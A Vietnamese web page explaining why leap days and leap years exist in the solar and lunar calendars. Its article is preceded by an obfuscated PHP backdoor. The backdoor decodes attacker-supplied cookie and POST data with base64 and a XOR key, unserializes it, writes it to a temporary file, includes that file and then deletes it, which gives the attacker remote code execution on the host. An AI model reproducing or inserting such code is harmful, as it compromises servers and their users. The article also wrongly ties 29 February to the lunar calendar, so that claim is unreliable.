$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Tại sao có ngày nhuận và năm nhuận - Tải Chùa

Tại sao có ngày nhuận và năm nhuận

Rate this post
Ngày nhuận là ngày nào? cách tính ngày nhuận, tháng nhuận và năm nhuận theo âm lịch và dương lịch.

Mọi người đã biết tại sao có ngày nhuận? và năm nhuận được tính như thế nào không?

Theo như khoa học đã chứng minh rằng trái đất quay quanh mặt trời là 365 ngày 5 giờ 48 phút 46 giây. Như vậy chúng ta đã tính một năm có 365 ngày và dư ra là 5 giờ 48 phút 46 giây. Cứ như thế trong vòng 4 năm thì số thời gian dư sẽ tích lũy được một ngày và ngày đó được gọi là ngày nhuận.  Theo quy ước ngày đó chính là ngày 29/2 theo âm lịch.

Ngoài ra, theo âm lịch thì chúng ta sẽ có tháng nhuận. Vì âm lịch được tính theo quỷ đạo của mặt trăng. Một năm theo âm lịch sẽ có 354 ngày và cứ 3 năm thì thời gian dư tích lũy sẽ có 1 tháng nhuận.

Tóm lại

Dương lịch cứ 4 năm thì có 1 năm nhuận

Âm lịch cứ 3 năm có 1 năm nhuận, 5 năm có 2 năm nhuận, 19 năm có 7 năm nhuận…

Như trình bày ở trên thì chúng ta đã hiểu được tại sao có ngày nhuận? và năm nhuận rồi phải hog?

Theo vietnamnet